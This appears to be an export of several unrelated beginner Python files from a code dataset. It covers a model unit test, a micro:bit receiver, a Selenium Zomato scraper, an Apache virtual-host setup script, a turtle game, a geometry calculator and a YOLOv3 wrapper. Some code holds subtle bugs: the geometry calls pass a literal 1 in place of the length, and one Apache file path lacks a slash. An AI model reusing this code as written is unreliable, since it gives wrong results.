from models import *
class Test_PlaceModel(unittest.TestCase):
"""
Test the place model class
"""
def setUp(self):
self.model = Place()
self.model.save()
def test_var_initialization(self):
self.assertTrue(hasattr(self.model, "city_id"))
self.assertTrue(hasattr(self.model, "user_id"))
self.assertTrue(hasattr(self.model, "name"))
self.assertTrue(hasattr(self.model, "description"))
self.assertTrue(hasattr(self.model, "number_rooms"))
self.assertTrue(hasattr(self.model, "number_bathrooms"))
self.assertTrue(hasattr(self.model, "max_guest"))
self.assertTrue(hasattr(self.model, "price_by_night"))
self.assertTrue(hasattr(self.model, "latitude"))
self.assertTrue(hasattr(self.model, "longitude"))
self.assertTrue(hasattr(self.model, "amenities"))
self.assertEqual(self.model.city_id, "")
self.assertEqual(self.model.user_id, "")
self.assertEqual(self.model.name, "")
self.assertEqual(self.model.description, "")
self.assertEqual(self.model.number_rooms, 0)
self.assertEqual(self.model.number_bathrooms, 0)
self.assertEqual(self.model.max_guest, 0)
self.assertEqual(self.model.price_by_night, 0)
self.assertEqual(self.model.latitude, 0.0)
self.assertEqual(self.model.longitude, 0.0)
self.assertEqual(self.model.amenities, [''])
if __name__ == "__main__":
unittest.main()
|
7,994 | dffa5e2f34788c6f5a5ccc7d8375317a830288b5 | from microbit import *
import radio
radio.on()
# receiver will show the distance to the beacon
# the number of receivers should be easily adjustable
while True:
message=radio.receive_full()
# the stronger the signal the higher the number
if message:
strength = message[1]+100
displaystrength = (int((strength/10)+1))
display.show(str(displaystrength))
sleep(200)
# if beacon is too far, also usable as a sixth level of light intensity
else:
display.show(Image.NO) |
7,995 | 96425986305171a9d23231f60b35dcbcbbd12d2d | from selenium import webdriver
import time
import xlwt
from JD_PhoneNo import get_phone_no
book = xlwt.Workbook(encoding="utf-8")
sheet1=book.add_sheet("Sheet 1")
browser = webdriver.Firefox()
browser.get("https://www.zomato.com/bhopal/dinner")
z_hotel_list = []
z_address_list = []
z_phone_list = []
z_rating_list = []
z_costoftwo = []
z_votes = []
z_hours = []
def traverse(a,b):
temp = []
for i in range(a,b,1):
a = str(i)
button = browser.find_element_by_link_text(a)
button.click()
name_list = browser.find_elements_by_class_name("result-title.hover_feedback.zred.bold.ln24.fontsize0")
add_list = browser.find_elements_by_class_name("col-m-16.search-result-address.grey-text.nowrap.ln22")
phone_list = browser.find_elements_by_class_name("item.res-snippet-ph-info")
for i in range(1,18):
if(i==4 or i==10 ):
continue
else:
try:
z_costoftwo.append(browser.find_element_by_xpath("/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div["+str(i)+"]/div[1]/div/article/div[3]/div[2]/span[2]").text)
except Exception as e:
z_costoftwo.append("NILL")
try:
z_hours.append(browser.find_element_by_xpath("/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div["+str(i)+"]/div[1]/div/article/div[3]/div[3]/div[1]").text)
except Exception as e1:
z_hours.append("NILL")
try:
z_votes.append(browser.find_element_by_xpath("/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div["+str(i)+"]/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/span").text)
except Exception as e1:
z_votes.append("NEW")
try:
z_rating_list.append(browser.find_element_by_xpath("/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div["+str(i)+"]/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/div[1]").text)
except Exception as e:
z_rating_list.append("NILL")
for names in name_list:
z_hotel_list.append(names.text)
temp.append(names.text)
for addname in add_list:
z_address_list.append(addname.text)
for phonename in phone_list:
z_phone_list.append(phonename.get_attribute("data-phone-no-str"))
if(int(a)<6):
clk = browser.find_element_by_xpath("/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[7]")
clk.click()
else:
clk = browser.find_element_by_xpath("/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[8]")
clk.click()
traverse(1,6)
traverse(6,11)
traverse(11,16)
traverse(16,21)
traverse(21,26)
# traverse(26,31)
# traverse(31,36)
# traverse(36,41)
# traverse(41,46)
# traverse(46,51)
# traverse(51,56)
# for i in range(1,5,10):
# traverse(i,i+5)
# traverse(i+5,i+10)
for i in range(0,len(z_hotel_list),1):
sheet1.write(i,0,z_hotel_list[i])
for i in range(0, len(z_phone_list), 1):
sheet1.write(i,1,z_phone_list[i])
for i in range(0, len(z_address_list), 1):
sheet1.write(i, 2, z_address_list[i])
for i in range(0,len(z_rating_list)):
sheet1.write(i,3,z_rating_list[i])
for i in range(0, len(z_costoftwo)):
sheet1.write(i, 4, z_costoftwo[i])
for i in range(0, len(z_hours)):
sheet1.write(i, 5, z_hours[i])
for i in range(0, len(z_votes)):
sheet1.write(i, 6, z_votes[i])
print("Writing to excel Finished")
book.save("ZomatoBhopal(data).xls")
|
7,996 | a8e67ddbb741af6a9ff7540fef8c21468321ede0 | import argparse
import sys
import subprocess
import getpass
# Process arguments
parser = argparse.ArgumentParser(description='Setup a new apache virtual host on an Ubuntu system. Only tested on versions 18.04 and 20.04')
parser.add_argument('domain_name', metavar='D', type=str, nargs='+', help='domain name to give to virtual host. multiple domains can be specified at once')
args = parser.parse_args()
# Confirm action with user
print("The following virtual host(s) will be created under their respective names.")
fa_flag = False
for arg in vars(args):
print(getattr(args, arg))
# List of port numbers
port_list = []
# Ask for ports for the each domain
print("Note: port defaults to 80")
for vh in sys.argv:
if vh == 'create_apache_vhost.py':
continue
port = input("Which port should be used for " + vh + "?: ")
if port:
port_list.append(port)
else:
port_list.append("80")
while True:
ans = input("Proceed? [Y/n] ")
if ans == 'n' or ans == 'N':
print("Exiting")
quit()
elif ans == 'Y' or ans == 'y':
print("Proceeding")
break
else:
print("Invald input")
# Install apache2 if not yet installed
install_sts = subprocess.call(['test', '-e', '/etc/apache2'])
if install_sts != 0:
print("Installing Apache")
subprocess.call(['sudo', 'apt', 'install', 'apache2'])
subprocess.call(['ufw', 'allow', "'Apache'"])
# Get username
username = getpass.getuser()
# Iterate though each virtual host to be created
index = 0
for vh in sys.argv:
if vh == 'create_apache_vhost.py':
continue
print("Creating virtual host: " + vh)
src_path = '/var/www/html/' + vh
subprocess.call(['sudo', 'mkdir', src_path])
subprocess.call(['sudo', 'chown', '-R', username + ':' + username, src_path])
subprocess.call(['sudo', 'chmod', '755', src_path])
subprocess.call(['sudo', 'touch', src_path + 'index.html'])
with open(src_path + '/index.html', 'a') as out:
out.write("""<html>
<head>
<title>Welcome to """ + vh + """</title>
</head>
<body>
<h1>""" + vh + """ virtual host is working!</h1>
</body>
</html>""")
conf_path = '/etc/apache2/sites-available/' + vh + '.conf'
subprocess.call(['sudo', 'touch', conf_path])
with open(conf_path, 'w') as out:
out.write("""<VirtualHost *:""" + port_list[index] + """>
ServerAdmin webmaster@localhost
ServerName """ + vh + """
ServerAlias www.""" + vh + """.com
DocumentRoot /var/www/html/""" + vh + """
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>""")
subprocess.call(['sudo', 'a2ensite', vh])
print("\n [" + vh + "] virtual host was successfully created!")
print(" - Source is located at " + src_path)
print(" - Config file is located at " + conf_path + "\n")
index += 1
subprocess.call(['systemctl', 'restart', 'apache2'])
|
7,997 | 8adda42dfebd3f394a1026720465824a836c1dd1 | import random
from turtle import Turtle
colors = ["red", "blue", 'green', 'peru', 'purple', 'pink', 'chocolate', 'grey', 'cyan', 'brown']
class Food(Turtle):
def __init__(self):
super().__init__()
self.shape("circle")
self.penup()
self.color("red")
self.speed("fastest")
self.refresh()
def refresh(self):
self.color(random.choice(colors))
self.goto(random.randint(-280, 280), random.randint(-280, 280))
|
7,998 | f275085a2e4e3efc8eb841b5322d9d71f2e43846 | from graphics.rectangle import *
from graphics.circle import *
from graphics.DGraphics.cuboid import *
from graphics.DGraphics.sphere import *
print ("------rectangle-------")
l=int(input("enter length : "))
b=int(input("enter breadth : "))
print("area of rectangle : ",RectArea(1,b))
print("perimeter of rectangle : ",Rectperimeter(1,b))
print()
print ("-------circle-------")
r=int(input("enter radius : "))
print("area of circle : ",circlearea(r))
print("perimeter of circle : ",circleperimeter(r))
print()
print ("-----cuboid-----")
l=int(input("enter length : "))
w=int(input("enter width : "))
h=int(input("enter height : "))
print("area of cuboid :",cuboidarea(1,w,h))
print("perimeter of cuboid : ",cuboidperimeter(1,w,h))
print()
print ("-------shpere-----")
r=int(input("enter radius: "))
print("area of shpere: ",spherearea(r))
print("perimeter of shpere : ",sphereperimeter(r))
print()
|
7,999 | f3d34379cc7fbfe211eeebec424112f3da0ab724 | # -*- coding: utf-8 -*-
import tensorflow as tf
from yolov3 import *
from predict import predict
from load import Weight_loader
class Yolo(Yolov3):
sess = tf.Session()
def __init__(self, input=None, weight_path=None, is_training=False):
self.is_training = is_training
try:
self.defrost()
self.input = tf.get_default_graph().get_tensor_by_name('import/input:0')
self.output = tf.get_default_graph().get_tensor_by_name('import/detections/output:0')
except:
if not input:
input = tf.placeholder(tf.float32, [None, 416, 416, 3], 'input')
self.input = input
self.input_size = self.input.get_shape().as_list()[1]
with tf.variable_scope('detections'):
self.output = self.graph()
self.loader = Weight_loader(tf.global_variables('detections'), weight_path)
# self.sess.run(tf.global_variables_initializer())
self.sess.run(self.loader.load_now())
self.freeze()
def predict(self, input_list, confidence_theshold=.6, iou_threshold=.5):
feed_dict = {self.input: input_list}
batch_detections = self.sess.run(self.output, feed_dict)
return predict(batch_detections, confidence_theshold, iou_threshold)
def freeze(self):
graph_def = tf.graph_util.convert_variables_to_constants(sess=self.sess,
input_graph_def=tf.get_default_graph().as_graph_def(),
output_node_names=['detections/output'])
with tf.gfile.GFile('frozen_yolo.pb', 'wb') as f:
f.write(graph_def.SerializeToString())
def defrost(self):
with tf.gfile.GFile('frozen_yolo.pb', 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
print('Found a frozen yolov3 model, defrost and use!')
tf.import_graph_def(graph_def)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.